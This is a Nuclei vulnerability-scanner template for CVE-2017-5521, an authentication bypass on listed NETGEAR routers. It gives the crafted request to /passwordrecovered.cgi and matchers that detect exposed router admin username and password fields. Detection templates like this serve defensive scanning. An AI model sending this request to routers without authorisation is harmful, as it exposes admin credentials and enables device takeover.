id: CVE-2017-5521 info: name: NETGEAR Routers - Authentication Bypass author: princechaddha severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.cvedetails.com/cve/CVE-2017-5521/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 tags: cve,cve2017,auth-bypass,netgear,router requests: - method: GET path: - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" matchers-condition: and matchers: - type: word part: body words: - "right\">Router\\s*Admin\\s*Username<" - "right\">Router\\s*Admin\\s*Password<" condition: and - type: status status: - 200 # Enhanced by mp on 2022/06/19